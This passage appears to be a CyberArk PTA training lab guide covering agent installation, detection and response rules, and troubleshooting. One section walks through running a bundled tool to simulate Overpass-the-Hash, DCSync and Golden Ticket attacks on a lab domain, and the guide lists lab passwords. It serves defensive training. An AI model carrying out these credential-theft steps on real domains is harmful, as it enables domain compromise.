9. In the Group domain field type in acme.corp
10. Click Save and ensure that the connection is successful.
11. Click on DASHBOARD in the top bar and you should see that the PTA is now
connected to Active Directory and that it has already detected a risk in our Active
Directory configuration. This change may take a moment to appear.
3/21/2022
12. While still in the PTA Dashboard, go to the Settings tab and click the PAS
Connectivity link in the left pane.
13. Confirm the PVWA CONNECTION DETAILS are as follows:
PVWA
We configured the connection to CyberArk PAM during the 18-step Preparation Wizard
executed earlier. Here, we are going to review our configuration and then activate some
additional PTA functionality through the PVWA.
To begin, let’s make sure that the PVWA has updated its configuration based on the
recent changes by restarting the IIS server, which you can do by opening a command line
with Run as administrator, typing iisreset, and hitting Enter.
3/21/2022
1. Now open a connection to the PVWA and log in as Mike.
2. Browse to Security -> Security Configurations and enable all the options, as
shown below.
PSM
Now we are going to configure the Privileged Session Manager to exchange information
with the PTA.
1. In the PVWA and connected as Mike, browse to Administration > Configuration

Options > Options > Privileged Session Management UI and set the parameter
PSMandPTAIntegration to Yes. Click Apply to save your change.
3/21/2022
2. Go to Options > Privileged Session Management > General Settings > Server
Settings > Live Sessions Monitoring Settings. Set AllowPSMNotifications to
Yes and click Apply. Verify that the parameter MonitoringLevel is set to Control.
This allows members of the group PSMLiveSessionTerminators to terminate PSM
sessions. CyberArk Vault Admins have already been added to this group.
3. Next, verify that the group PSMLiveSessionTerminators is set for the two
parameters Terminating Live Sessions Users and Groups and Suspending Live
Sessions Users and Groups under Live Sessions Monitoring Settings.
4. Click on Apply to save your settings.
5. Next navigate to Options > Access Restriction, right-click on Access Restriction

and select Add AllowedReferrer.
6. In the BaseUrl parameter, enter the ptaserver.acme.corp, set RegularExpression

to Yes, and click OK to save all the changes and close the Options.
3/21/2022
3/21/2022
Windows Agent – Event Forwarding

Now we will install the PTA Agent software on the Target Windows machine: target-
win.acme.corp. This will involve running a wizard that will build the installation script for
the PTA Agent. The software files have already been copied to the destination machine
for convenience.
Installing the Windows Agent
We will perform this action using an RDP connection on the PSM. In that way, our actions
will be recorded and can be monitored.
This process is divided into two tasks:
• Running the PTA Agent Script Creator

• Running the PTA Agent Installer
Running the PTA Agent Script Creator
This task builds a script that is then used to install the PTA Agent on a Windows server
with the appropriate parameters.
1. Log in to the PVWA using the Mike user.
2. Find the domain account administrator and select the machine target-win.acme.corp.
Click Connect to open an RDP connection via the PSM to the target server.
3. Once the RDP connection is created, browse to the folder C:\PTA Course using
Windows Explorer.
4. Right-click on the file PTA Agent Script Creator.exe and select Run as
administrator.
5. Enter the FQDN of the PTA servers – ptaserver.acme.corp – and hit Enter
6. Leave the default PTA Management Port and PTA Data Port by hitting Enter on
both.
7. Enable PTA server certificate and client authentication by entering y on both.
8. For the subject name of the certificate, enter target-win.acme.corp. This is case
sensitive.
9. Leave the default location %TEMP% for the installation log by entering n.
3/21/2022
10. Next say n to leave the default location for the PTA Agent MSI file
11. Next say y to have PTA Agent analyze Windows events.
12. To exit the configuration tool, hit Enter a last time. This will close the command-line.
Running the PTA Agent Installer
Now we are going to open the file that was created during the last exercise and run the
command as an administrator. Because the command contains the full path to the MSI
installation file, you can run this from anywhere, but you must run it as administrator.
1. Next go back to the PTA Course folder and open the file PTAAgentInstallerOutput.txt,
do a Select All, and then Copy.
2. Open up a command line session using the option Run as administrator.
3. Paste the contents of the output file into the command line and hit Enter. You will
need to wait a moment for the installation to complete.
Note: It will look as if nothing is happening for a minute or two, but it is working. Be
patient. You should soon see a pop-up CMD window (see image below) that will
auto-dismiss after 5 seconds to inform you that the installation has been successful.
Verifying the installation
1. Open Windows Services (by typing “services.msc” or using the shortcut in the task
bar).
2. A new service called CyberArk Privileged Threat Analytics should now appear with
the status Running.
3. Go to C:\Program Files\CyberArk\PTA Agent folder and open the config.ini
4. Verify the parameters highlighted in yellow below, making sure that the values are
exactly as shown. If they are not, fix them now, save the file, and restart the PTA
Agent service.
3/21/2022
[Forwarder]
Windows_Event_Log=Security
[ServerInfo]
PTA_IP_Address=ptaserver.acme.corp
SSL_Data_Port=6514
SSL_Control_Port=7514
Data_Port=11615
[DCInfo]
Network_Interface_ID=1
Server_Verification_Required=true
Windows_Event_Enabled=true
Network_Enabled=false
[ClientCertificate]
Client_Certificate_Enabled=true
Client_Certificate_Subject_Name=target-win.acme.corp
Note: You will probably have to change the first parameter Windows_Event_Log. The
ForwardedEvents option is used only when the agent is installed on a Windows
Event Forwarding [WEF] Server. Restart the CyberArk Privileged Threat
Analytics service once you have made the change and saved the file.
5. In the same folder, right click on PTAAgentAdmin.exe and select Run as

administrator.
6. Select 1 to print statistics and you should see the following that the Agent was
successful in connecting to the PTA server.
3/21/2022
7. When you are finished, enter q + Enter to exit the tool.
8. Finally, when you close down the RDP session, make sure that you only log out of
the session. Do not shut down the machine by mistake. Click on the Windows Start
menu, then click on the user name Administrator, and click on Sign out.
Note: Log into the PTA Dashboard. You should see that you have a new source of data
labelled SIEM.
3/21/2022
Testing the Initial Configuration

In this section, we will be testing the CyberArk Privileged Threat Analytics component.
Both the target CentOS and Windows servers have been configured to forward security
information to the PTA.
First, we need to prepare the environment a little for our exercises. Then we will be
looking at:
• Unmanaged Privileged Access

• Suspected Credential Theft and Automatic Password Rotation
• Suspicious Password Change and Automatic Reconciliation
• Suspicious activities in a session and automatic suspension
• Security Rules Exceptions
Preparing the environment
RootXX Users
We are going to make a small change to the rules for detecting privileged logins to
Unix/Linux servers. By default, the PTA is configured to detect logins from any user
named “root”. We want to catch “root” and every variation of root, such as “root01”,
“root02”, etc.
1. Open up the PTA Dashboard and go to the SETTINGS tab.
2. On the left, click on Privileged Groups and Users.
3. Scroll down the list until you see the entry for the Platform unix and the user root.
4. Double-click the entry and change root to root.* (that is: root period asterisk) Click
the Save button.
5. As a last measure, just to make sure that the PVWA updates its configuration, run an
IISRESET. This is not required, but it will help us move more quickly.
3/21/2022
Last CyberArk Login
To detect Suspected Credential Theft, the PTA compares the login time on the target
machine with the last time the password was retrieved from the Vault. By default, the PTA
creates a Suspected Credential Theft event if the password was not retrieved within the
last 8 hours (480 minutes). For the purposes of this lab, we will configure the PTA to raise
an alert if the password was not retrieved within the last 3 minutes.
Note: To save time, we are also going to add a parameter that will help us with a later
exercise on Active Directory security and unconstrained delegation.
1. Launch a connection to the ptaserver1 as root from the PVWA.
2. Enter the shortcut “LOCALPARM” (without the quotes). This will open the local
system properties file (/opt/tomcat/diamondresources/local/system.properties) in a vi-
like editor.
3. Add these two new lines to the file (it does not really matter where).
not_via_pim_time_window=3
unconstrained_delegation_accounts_attributes_query_task_trigger=0 */3
* * * ?
Note: If you struggle with vi, don’t panic! You are not alone.
Don’t use the numeric keypad.
Use the Insert button to enter edit mode.
Use the Escape button to exit edit mode.
You can paste from the desktop using a right-click.
:wq to save your changes (colon + w + q).
:q! to panic and exit the file without saving so that you can start again (colon + q + !)
4. To ensure that the change to the local parameters are taken into account, restart the
PTA service with the command:
service appmgr restart
Unmanaged Privileged Access
In this section you will observe how the PTA detects when privileged accounts are being
used and then check if they are being managed by CyberArk. If the account is not
managed, the PTA will generate a security alert and add the account to the list of Pending
Accounts. A Vault administrator can then onboard the account to the relevant safe.
Automatic Onboarding Rules can also be applied starting from CyberArk PAM v11.4.
3/21/2022
Note: Due to the constrained resources of our training environment, you will need to wait a
minute or two between restarting the PTA service and provoking an unmanaged
privileged access alert. If the alert does not appear the first time, try it again.
First, we need to establish an SSH session to the target Linux server to create an alert on
the PTA, which we will review using the Security pane in the PVWA.
1. Open PuTTY from the Components server (not through the PVWA – you will find a
shortcut in the toolbar) and open an SSH session to target-lin as root02 (password:
Cyberark1). You can use the PuTTY shortcut Target Linux.
2. Login to the PVWA as Mike and go to Security > Security Events and verify that
you can see the “Unmanaged privileged account” alert related to root02. Again,
this might take a moment to appear.
3/21/2022
Note: This detected event is a result of the change we made earlier to the Privileged
Groups and Users. Because this account matches the regular expression root.*,
the PTA sees this event as an unmanaged privileged access. And because we set
the rule for Unmanaged Privileged Accounts to Add To Pending under the
Security Configurations / Automatic Remediations, this account is now in the
Pending List waiting to be onboarded. You can add other usernames (using
regular expressions) that should also be detected by the PTA as privileged accounts
to be managed by CyberArk PAM.
3. Go to Accounts > Pending & Discovery > Pending Accounts. Select root02 from
the list (use “Refine By” to search for the account if needed) and click on Onboard
Accounts.
4. Onboard the account to the LIN-PTA safe and associate the account with the Linux
via SSH 30 platform.
5. Use the option Set a default password and enter Cyberark1 as the default
password (do not use the Reconcile option).
Suspected Credential Theft and Automatic Password Rotation
In this section you will configure the PTA to detect when privileged accounts are being
used without first retrieving the password from CyberArk PAM and trigger the CPM to
initiate a password change.
1. Login to the PVWA as Mike and go to POLICIES > Safes. Hover over the LIN-PTA
safe and click on the Members button at the end of the line.
3/21/2022
2. Click on Add Member and search for pta in the Vault. This will find both the
PTAUser and the PTAAppUser. First, select the PTAUser. Keep the default
permissions and expand Account Management. Select “Initiate CPM account
management operations” and click on Add.
3. Repeat the step above to add the PTAAppUser to the LIN-PTA safe as well
(including the “Initiate CPM account management operations” permission).
3/21/2022
4. Close and exit your PuTTY session to target-lin if it is still open.
By this time, the three minutes that we set with the parameter not_via_pim_time_window
should have expired.
5. Once again, open PuTTY from the Components server (not via the PVWA) and
open an SSH session to target-lin as root02 (the password should still be
Cyberark1).
6. Login to the PVWA as Mike and go to Security > Security Events and verify that
you can see the “Suspected Credentials Theft” alert related to root02.
3/21/2022
7. In the Accounts tab, go to the root02 account and verify that the CPM has changed
the password (or that a change is planned; it may take a couple of minutes).
8. Open the Activities tab to verify that the CPM changed the password after the PTA
detected the suspected credential theft alert and under Activities added the file
category ResetImmediately = ChangeTask.
9. As a final step, go back to the Security Events view and click the Close button. A
pop-up will ask you to confirm the action. Click Close Event to inform the PTA that
the incident has been handled.
Suspicious Password Change and Automatic Reconciliation
In this section you will configure the PTA to detect when a password is changed manually,
bypassing the CPM, and have the PTA trigger the CPM to reconcile the password.
For this exercise to work, we have configured the existing account root01 as a reconcile
account for the platform Linux via SSH 30.
1. Login to the PVWA as Mike and go to Accounts > Accounts View, select the root02
account, and launch an SSH connection via the PSM.
2. Type the following command to change the password of root02 back to Cyberark1:
passwd root02
3/21/2022
3. Go back to the PVWA as Mike and go to Security > Security Events. You should
be able to see two new alerts: one for “Suspicious activities detected in a
privileged session”, and one for “Suspicious password change”.
Explanation: Because the Platform has automatic reconciliation configured, we have configured
the PTA to perform a reconciliation when a suspicious password change is
detected. The password will be changed from the one set by the user to a random
one known only to the Vault.
4. Still in the Security Events view, click on the Session ID. This will bring us to the
Monitoring view where we can see additional information about the session in
question, which is still running.
5. Here we have the possibility to terminate the session, thereby cutting off the
attacker’s access; suspend the session if we have a doubt that it is an attack; to
resume a previously suspended session; and to monitor sessions live. We have
already seen this functionality in the PAM Administration training, so just click
Terminate to end the session. You will have to click on the RDP file sent to Mike to
terminate the Putty session.
3/21/2022
6. Go to Accounts > Accounts View and select root02. Verify that root02 was indeed
reconciled by the CPM (remember that a reconcile may take a little longer than a
password change).
You may see a message like the one below. This is misleading, just be patient.
3/21/2022
Note: If for some reason you do not see the automatic reconcile, check your security
configuration to make sure that automatic rotation is activated for suspicious
credential theft.
Suspicious activities in a Windows session and automatic suspension
In this section, we will configure a rule that says that if anyone opens the application used
to manage our email server, that session will be suspended. Before we begin, let’s just
make sure that everything is ready for this exercise.
First, go to Options → Privileged Session Management → General Settings → Server

Settings → Live Sessions Monitoring Settings and make sure the parameter
MonitoringLevel is set to Control. We checked this earlier, so it should be correct.
Now log into Private Ark Client and browse to Tools → Administrative Tools → Users
and Groups and make sure that the AD group CyberArk Vault Admins is a member of
the groups Auditors and PSMLiveSessionTerminators. This should also be the case,
but it never hurts to check.
Create the Rule
1. Logon to PVWA as Mike and go to Security > Security Configurations.
2. Under Privileged Session Analysis and Response, click on Add rule.
3. In Category, select Windows titles.
4. In the Pattern field enter (.*)MailEnableAdmin(.*)
5. In the Description field enter This is to prevent unauthorized use of the Email
Server Admin Console.
6. In the Session Response field, select Suspend, ensure that the status is Active,
and click Add.
7. In the Score field enter 99 (this is serious!).
Test the Rule
John is a Windows administrator and is going to test our new rule.
3/21/2022
1. For convenience, leave open the first PVWA session and log into the PVWA again
using another browser or a new incognito session with the LDAP username John and
the password Cyberark1.
2. Go to the Accounts view and locate the credentials for the domain account
administrator on acme.corp and launch a PSM connection to the Domain Controller
dc01.acme.corp.
3. Open the Windows Start menu and select MailEnable. This is the administration
tool for the email server.
4. Your RDP session will be suspended.
3/21/2022
5. Go back to the PVWA session you opened as Mike and go to Security Events and
look for these recent events.
6. Click on the Resume button to allow John to shut down the offending application.
Go back to the RDP session for DC01, close the MailEnable application, and log off
the machine (do NOT shut down the machine).
Tip: If you want to give John the right to edit the email server, you could create an
exception for him in the rules.
You can close John’s connection to the PVWA.
3/21/2022
Suspicious activities in an SSH session and automatic termination
In this section you will configure the PTA to detect when a risky command is used in a
privileged session and to terminate the session automatically.
1. Login to the PVWA as Mike and go to Security > Security Configurations >
Privileged Session Analysis and Response. Find the SSH rule for the passwd
command (the *Nix command for changing passwords) and click on Edit.
2. Configure the risk to a score of 95 and the Session Response to Terminate. Click
on Save.
3/21/2022
3. Go to Accounts > Accounts View and select the root02 account. Launch a
privileged session by clicking on the Connect button.
4. When the session opens, try to run the passwd root02 command again. The
session should close immediately when you hit Enter.
5. Back in the PVWA and verify that you can see the recent security alerts and that the
last session got a score of 95. You can close this event and any others that we have
already managed.
Security Rules Exceptions
In this section, we will tweak the rule we created in the last section so that if a designated
user needs to execute passwd during a session, their session will not be suspended out.
1. Go back to Security > Security Configurations, select the passwd rule, and click
the Edit button.
2. To create an exception to the rule, click on Change scope.
3/21/2022
3. Enter the user name Carlos in the field, hit Enter (this is required to enter the user
name into the field), and then click the Change Scope button. You will then be
returned to Edit Rule dialogue. Click Save to close the dialogue.
3/21/2022
4. To test the rule, you can log in to the PVWA as the user Carlos and run the passwd
command against any of the accounts in the LIN-PTA safe. Your session should not
be terminated.
Note: Because we have set a rule to reconcile any account that is changed outside of the
CPM, any account modified in this way will automatically be reconciled.
Automatic Onboarding Rules
The PTA can also be configured to onboard newly discovered privileged accounts
automatically through the use of Onboarding Rules. In order to do this, we need to give
the PTA users - PTAAppUser and PTAUser – access to the target Safe so that they can
create and modify accounts.
Modify the target Safe permissions
1. Return to PVWA, login as Mike, and go to Polices -> Safes.
2. Select the Safe LIN-PTA and click on the Members button.
3. Modify the rights for the Vault users PTAAppUser and PTAUser by adding the
following Safe authorizations:
• Add Accounts (includes update properties)

• Update account content
• Update account properties
• Rename accounts
3/21/2022
Create a new rule
1. Next click on Accounts -> Onboarding Rules and create a new rule using the
wizard with the following parameters:
System type *NIX
Machine type Any
Account type Local
Account category Any
Privileged account type Any
Platform Linux via SSH 30
Safe LIN-PTA
Name Onboard to LIN-PTA
With this rule, when the PTA detects the use of a new unmanaged Unix or Linux account,
it will automatically add the account to CyberArk PAM and place it in the LIN-PTA Safe.
3/21/2022
Test the rule
1. Open a new PuTTY session (not via the PVWA) to the Target Linux machine at
10.0.0.20 with root03 and password Cyberark1.
2. Now go back to the PVWA and Security > Security Events. You should see a new
event with risk score of 30 and that remediation has been initiated. The account has
been automatically onboarded and reconciled thanks to our rule.
Note: This may take a moment, so be patient.
3. Next, go to the Accounts tab in PVWA and find the recently onboarded root03
account and verify that it has been onboarded and reconciled.
4. Don’t forget to close the event in the Security Events window.
3/21/2022
Installing the Agent on a Domain Controller

In this section we will be installing the PTA Agent on the DC01 server. This is required in
order to detect Kerberos related attacks.
Note: The PTA Agent on a domain controller (or the Network Sensor machine) are not
part of the Core PAM basic license and requires an additional license.
Installing the PTA Agent
Now we are ready to install the PTA Agent on the domain controller. This process is
similar, although not identical, to installing the Agent on a regular Windows server.
As when we installed the PTA Agent on a Windows server, this process is divided into two
tasks:
• Running the PTA Agent Script Creator

• Running the PTA Agent Installer
Running the PTA Agent Script Creator
1. Launch a PSM connection with the administrator account to dc01 in the PVWA.
2. Browse to the folder C:\PTA Course using Windows Explorer.
3. Launch the PTA Agent Script Creator.exe using Run as administrator
4. Enter your PTA address ptaserver.acme.corp and hit Enter
5. Leave the default PTA Management Port and PTA Data Port by hitting Enter on
both
6. We are going to authenticate both our server and our client, so enter Y for server
authentication and client authentication and enter the FQDN as the Subject Name
exactly as: ptaagent (this is linked to a certificate specifically created for this purpose
in this lab).
Note: This field is case sensitive.
7. Leave the default location “%TEMP%” for the installation log by entering n.
8. Next type n to leave the default location for the PTA Agent MSI file.
3/21/2022
9. Next type n to have PTA Agent analyze network traffic.
10. Hit Enter to exit CMD line.
Running the PTA Agent Installer
1. Next go back to the PTA Course folder and open the file PTAAgentInstallerOutput.txt
2. Open a command window as administrator (“Run as Administrator”), copy the

contents from the output file, and run it (make sure you run as administrator).
3. As before, you will need to wait a moment for the installation to complete.
Note: You should see a pop-up CMD window appearing that will auto dismiss in 5 seconds
to inform you that the installation has been successful
4. Open the Services window and you should see a new service called CyberArk
Privileged Threat Analytics with the status Started.
5. Open the properties for the service and change the Startup type from Automatic to
Automatic (Delayed Start).
6. In the Recovery tab, change the response to First failure to Restart the service.
3/21/2022
These changes will help ensure the continuity of the service in the event the server is
restarted.
Verifying
1. Go to C:\Program Files\CyberArk\PTA Agent folder.
2. Open the file config.ini and verify the values highlighted in yellow below. If the
information is not exactly as shown, correct it in the file, save your changes, and then
restart the service.
[Forwarder]
Windows_Event_Log=ForwardedEvents
[ServerInfo]
PTA_IP_Address=ptaserver.acme.corp
SSL_Data_Port=6514
SSL_Control_Port=7514
Data_Port=11615
[DCInfo]
Network_Interface_ID=1
Server_Verification_Required=true
Windows_Event_Enabled=false
Network_Enabled=true
[ClientCertificate]
Client_Certificate_Enabled=true
3/21/2022
Client_Certificate_Subject_Name=ptaagent
3. Right click on PTAAgentAdmin.exe and select Run as administrator.
4. Enter 1 to print statistics and you should see the following that the Agent was
successful in connecting to the PTA server.
5. Return to the PTA Dashboard and you should see at the bottom all 5 sources of
inputs from the Vault, SIEM, Unix, Network Sensor, and AD.
Note: You may need to restart your PTA server for the dashboard to be refreshed. Run
“service appmgr restart” on the PTA command line.
3/21/2022
Running AGENTSHELL
1. Launch a connection to the PTAServer1 as root and run AGENTSHELL
Note: AGENTSHELL is similar to PTAAgentAdmin.exe but this allows you to check

connectivity to your PTA agents from the PTA Server. You should now see both
agents appearing.
2. Enter the IP address for the domain controller: 10.0.0.1 and hit Enter. Then enter 1
and Enter to show statistics.
Note: You may observe a number of failed connection attempts in the statistics. This is
the PTA Agent attempting to connect to the second PTA server, which is not yet
online.
3/21/2022
3. Enter a to change target and perform the same test for 10.0.21.1 to check for agent
connectivity. When you are finished, enter q to quit.
3/21/2022
Kerberos Attacks
In this section, we are going to run a number of attack-simulation tools to generate data for
capture by our Network Sensor and for analysis by the PTA. The attacks we will simulate
are:
• Overpass-the-Hash
• DCSync
• Golden Ticket
Note: Before running these exercises, verify that the CyberArk Privileged Threat
Analytics service is up and running on the domain controller DC01.
Overpass-the-Hash
Our friend John wants to be able to connect with his Active Directory account to Target-
Win so that he can perform administrative tasks on that server without bothering to go
through CyberArk PAM (bad John!), so he has added himself to the local administrator
group.
Unfortunately, John is not too careful. He got phished and someone was able to get his
password. That person is going to log in to Target-Win and wait for a domain
administrator to log in so that she can grab the hash and connect to the domain controller.
The purpose of this exercise is to demonstrate the risks of not respecting the rules of best
practice and how CyberArk can protect an organization from this kind of behavior and
against the attacks to which this behavior exposes your organization.
Allow the PTA to perform automatic password rotation
We performed this task earlier for the LIN-PTA safe. Now we are going to do it for the
Safe where our Windows accounts are stored.
1. Go to the Policies > Safes window, click the Win-PTA safe, and then click
Members.
2. Click Add Member and search for the PTAUser.
3. Give the user the same rights as we did on the Safe LIN-PTA.
4. Repeat the steps to add PTAAppUser with the same rights.
3/21/2022
The attack begins
Now the attacker performs her reconnaissance. She is going to connect to Target-Win
with the password she phished from John.
1. Go to the Skytap environment view and click on the server labelled Target Windows.
This is the machine Target-Win.
3/21/2022
2. Log in as the domain user John with the password Cyberark1.
3. Open Windows Explorer and browse to c:\KAG_V5, right-click on the Windows batch
file KerberosAttacksGenerator.bat and select Run as administrator.
4. Now wait for your victim.
The victim connects
Tom, who has access to a domain administrator account, wants to perform some
maintenance on target-win.
1. On Components, connect to the PVWA as tom and launch a connection with the
account admin01 to the machine target-win.
2. Do not close the RDP session open, leave it open. You don’t need to do anything.
The hash of admin01’s account is now in the system memory of target-win. Admin01 is a
domain administrator, so if the hacker can grab that hash, she can use it to get a foothold
on the domain controller.
The attack continues
1. Return to false John’s session on target-win. In the PowerShell window, after the
tool checks the pre-requisites, enter 1 and hit Enter to launch an Overpass-the-
Hash attack.
3/21/2022
2. The tool will then scan the memory for credentials. It should find admin01, among
others, with each credential assigned a number. Enter the number associated with
the admin01 account. In the example below, this is number 1, but on your system it
might be different.
3. Next, the tool proposes to use 1 – AES hash, 2 – NTLM hash, or 3 – both. Enter 3
to send both hashes (this will also increase our chances of success).
3/21/2022
4. If successful, a new CMD window will open with a remote session on the domain
controller with the credentials admin01 (make sure you get the new shell otherwise
the attack was not successful, and you will not see an event in the PTA Dashboard).
Note: You may need to run this a second time if it does not work the first.
The response
1. Go back to the PVWA as Mike and go to Security > Security Events on the PVWA
and look for this event. Notice the message “Initiated remediation”. This indicates
that the CyberArk has performed an automatic action in relation to this event.
3/21/2022
2. Go to Accounts > Accounts View and locate the admin01 account. You should see
that the password has been changed.
Note: As a follow-up to this, the security operations team would have to identify and
terminate the remote session initiated by the hacker with the stolen password.
Also, it would probably be a good idea to restrict access to domain administrator
accounts and to limit those accounts only to servers where they have legitimate
business.
3/21/2022
DCSync
For this exercise, we are going to use DCSync. This technique allows an attacker to
mimic the behavior of another domain controller and to induce the real controller to share
information about the password history of a particular account in the form of hashes. If the
attacker is able then to crack the hashes, she will then have an idea about the
administrator’s strategy for generating passwords and perhaps be able to guess the next
one.
For this operation, we will imagine that a hacker has the credentials of a user who can
synchronize a domain controller. A domain admin can do that.
The attack
1. Logon to target-win again through Skytap, but this time use the account admin02.
2. Run the Kerberos Attacks Generator batch file with the option Run as
administrator as we did before, bypassing execution policy. The KAG is in
c:\KAG_V5.
3. This time enter option 4 for DCSync.
4. Enter the name of the account for which you want to retrieve the information:
administrator and watch the results.
3/21/2022
The attack has been successful and the attacker now has a wealth of data about the
domain administrator account.
5. Enter 9 to close the KAG tool.
The response
1. Log in to PVWA as Mike and look for this recent event under Security Events.
3/21/2022
There are two entries related to this attack. The first one is an unmanaged privilege
account notification. This tells us that someone logged into target-win using a privileged
account – admin02 – that is not under CyberArk PAM management. The next step would
be to onboard this account and perform a password change.
The second notification informs us of the DCSync attack. When seen in the context of the
previous message, this becomes an extremely high-risk event and must be dealt with
immediately. We would need to terminate admin02’s session, find out which accounts
were compromised, and rotate them.
As a final step, you would log into the Security Events and close it.
Golden Ticket
In this section we will detect a Golden Ticket attack. In a Golden Ticket attack, the attacker
gains control over the domain’s Key Distribution Service account (KRBTGT account) by
stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets
(TGTs) for any account in the Active Directory domain. With valid TGTs, the attacker can
request access to any resource/system on a domain from the Ticket Granting Service
(TGS).
Configuring Golden Ticket attack detection
In this section, we are going to configure Golden Ticket detection, which we skipped over
during the initial configuration. Note that we will say No to the first two options presented
to us.
1. In the PVWA, open a connection to PTAServer1 as root.
2. Go to /opt/tomcat/utility (UTLITYDIR) and run:
./goldenTicketConfiguration.sh
3. Enter n not to configure Step 1/3 – PAS connection configuration (we have
already done this).
4. Enter n not to configure Step 2/3 – Network sensor and PTA Agent connection
configuration (we have already done this).
5. Enter y to configure Step 3/3 – Golden Ticket detection configuration.
6. Specify the domain name to monitor as acme.corp
3/21/2022
7. Say n to monitor sub-domains.
8. The domain controller IP is 10.0.0.1
9. Safe name is CyberArk-Service-Accounts
10. Leave Root as the default folder and hit Enter.
11. Enter the full object name of the specially created domain account: cyberark-pta-
golden. The easiest way to obtain this name is by locating the account in the PVWA,
opening it in the classic interface, and copying and pasting the name from there. In
this way, you can be absolutely sure that you have the correct name.
Note: This is the object name for a dedicated service account on the domain controller and
is already in CyberArk PAM. This special domain user needs to be created with the
following replication permissions:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes In Filtered Set.
12. Enter the CyberArk administrator username administrator and password

Cyberark1 (twice).
3/21/2022
13. Say n not to monitor an additional domain.
14. PTA Server will now finish with the Golden Ticket configuration and restart the
appmgr service automatically.
The attack
1. If you are not already logged on, logon to target-win.acme.corp again through
Skytap, using the account admin02.
2. Run the Kerberos Attacks Generator as we did before, bypassing execution policy
and choosing the option Run as administrator. The KAG is in c:\KAG_V5.
3. This time enter option 3 for Golden Ticket.
4. Enter Joker when asked to choose a username to impersonate, although you can
choose anything you want.
Note: The KAG tool will now create the Golden Ticket for the user “Joker”, who is not a
valid user in your domain, but because the tool is able to steal the hash of the
domain krbtgt (Kerberos ticket generating ticket) account and inject the created
ticket into the current session.
5. To verify the attack worked, make sure you receive the shell on DC01 Joker
3/21/2022
The response
1. Log in to PVWA and under Security Events look for this recent event.
Note: You may see more than one event related to this attack.
3/21/2022
Active Directory Risks

In this section, we will look at some of the ways in which CyberArk PTA protects your
organization from risks arising from poor Active Directory hygiene. Specifically, we will
look at:
• Exposed credentials
• Unmanaged domain accounts
• Unconstrained delegation
Exposed Credentials
For this to work, we need to “break” our PTA LDAP/S connection by reconfiguring it to use
regular unencrypted LDAP.
Note: Obviously, this is not a recommendation. We are doing this only so that we may see
how the PTA detects this risk.
1. Log in to the PTA Dashboard with the administrator account and password
CyberArk1234.
2. Go to the SETTINGS tab and select AD Connectivity.
3. Change the parameter LDAP over SSL to No. Notice the port number changes.
3/21/2022
4. Save your changes and then log out of the PTA Dashboard.
5. Now log in to the PVWA and in Security -> Security Events, you can see the
Exposed Credentials risk.
6. Once tested, reactivate the connection over LDAP/S and save the modification.
3/21/2022
Unconstrained Delegation
In an earlier exercise, we added a parameter concerning unconstrained delegation that

scans Active Directory every hour, so by now the PTA will have discovered that the Active
Directory account scanaccount01 is open to abuse due to over-generous delegation.
The PTA detects these configurations and displays them so that administrators can make
decisions about what to do. There may be a reason why a service account is configured
this way. In any case, this account is a good candidate for onboarding to the Vault.
If you want to remove this risky delegation, log on to the domain controller with the
administrator account, go to the Users container and locate the scanaccount01. Right-
click on it and select Properties, go to the Delegation tab, and select Do not trust this
user for delegation. Apply your changes.
You can run the following command on the domain controller to remove the SPN:
setspn –d account/nevermind scanaccount01
3/21/2022
Managing PTA Accounts with CyberArk

In this section, we will onboard the PTA accounts to CyberArk PAM.
Managing the PTA Administrator (Web Dashboard)
In this section, we are going to onboard the PTA Dashboard administrator account to the
Vault and connect via the PSM.
1. Log in to the PVWA as Mike and create a new Safe called it CyberArk Accounts.
2. Create a new account with the following properties:
System type Application
Platform CyberArk PTA
Safe CyberArk Accounts
Address ptaserver.acme.corp
Username administrator
Password CyberArk1234
Port 443
Ignore certificates No
3/21/2022
3. Test the connection by clicking on the Connect button.
Note: You may have to run it twice. Also, if you were previously logged into the PTA
normally (through Chrome) and did not log out before closing your session, you may
need to log out that session before this will work.
3/21/2022
Troubleshooting
Shortcuts Utility
The output of this command is included as an appendix at the end of this guide.
1. Open a connection to the PTA server.
2. Type “shortcuts.sh” on command line to see list of options (Type “shortcuts.sh |

more” to see the different types of logs that you can gather from diamond.log).
3. Take a couple of minutes to go through the Aliases and see what information is
presented for each.
4. Spend some time looking into the diamond.log. This is the main log file for your
PTA server and you will need to use some basic Unix commands such as cat, grep,
| (pipe), > (redirect to file) and other commands to extract the data that will assist in
your troubleshooting. For example, the following would output all occurrences of the
string “administrator” on 25 February 2022:
cat /opt/tomcat/logs/diamond.log | grep administrator | grep 2022-02-

25 | more
3/21/2022
5. Execute “RUN_DIAGNOSTICS” on your PTA server and look at the generated log for
any issues or misconfigurations.
Note: This is a lengthy process, so you might want to run it just before going on a break.
Changing Log Levels
1. You can adjust log levels with the script changeLogLevel.sh (case sensitive). This
script can be run from any location without entering the full path.
2. Change the debug level for Listener to debug as shown below (refer to
documentation)
3. Run “shortcuts.sh 13”. This will output only the most recent incoming syslog
messages from all sources. See documentation and/or the previous exercise for
more information.
4. Next try connecting to Target Linux machine at 10.0.0.20 via PSM or using PuTTY to
create some Syslog events.
3/21/2022
Export Tool (CyberArk Support)
The PTA has a built-in tool that can create an export of system configuration information
that can be used when interacting with CyberArk Support about any issues you may
encounter.
1. Go to /opt/tomcat/utility and run exportTool.sh.
2. Enter the number of days of prior records to include (type in “3”, for example).
3. Next type in n not to include db files.
4. Type in y to export dump files.
5. Go to /opt/tomcat/logs folder and look for the recently created archived file. When
working with CyberArk Support, provide them with this archive file.
3/21/2022
PTA DR Server
In this section, we are going to configure our DR server, a process that is very much like
the process for configuring the primary server. We will generate a certificate ptaserver2
as we did for for ptaserver1 (the difference will be in the SAN), and run another wizard.
First, make sure that the virtual machine for PTAServer2 is started in Skytap. It is
programmed not to start automatically.
Note: The PTA version on the ptaserver2 machine has already been installed with 12.2.3
in preparation for this training, so there is no need to run an installation.
Getting a Certificate
Creating the CSR
1. Go to Components and launch a new SSH connection to ptaserver2.acme.corp

(this account is already in CyberArk PAM).
2. Go to the utility directory and launch the PTA Utility tool.
UTILITYDIR
./run.sh
3. Select option 14 from the menu (Generating a Certificate Signing Request).
4. Enter the host name of the PTA:
ptaserver.acme.corp
5. Enter the Organization name:
ACME
6. Enter the department name:
Training
7. Enter the City name:
New York
8. Enter the State:
3/21/2022
NY
9. Enter the Country code:
US
10. Enter the shared FQDN:
ptaserver.acme.corp
11. Enter the Subject Alternative Names:
Note: Once again, you can either copy the CSR from the PuTTY screen or follow the
instructions below to get the file from the 10.0.0.3 server.
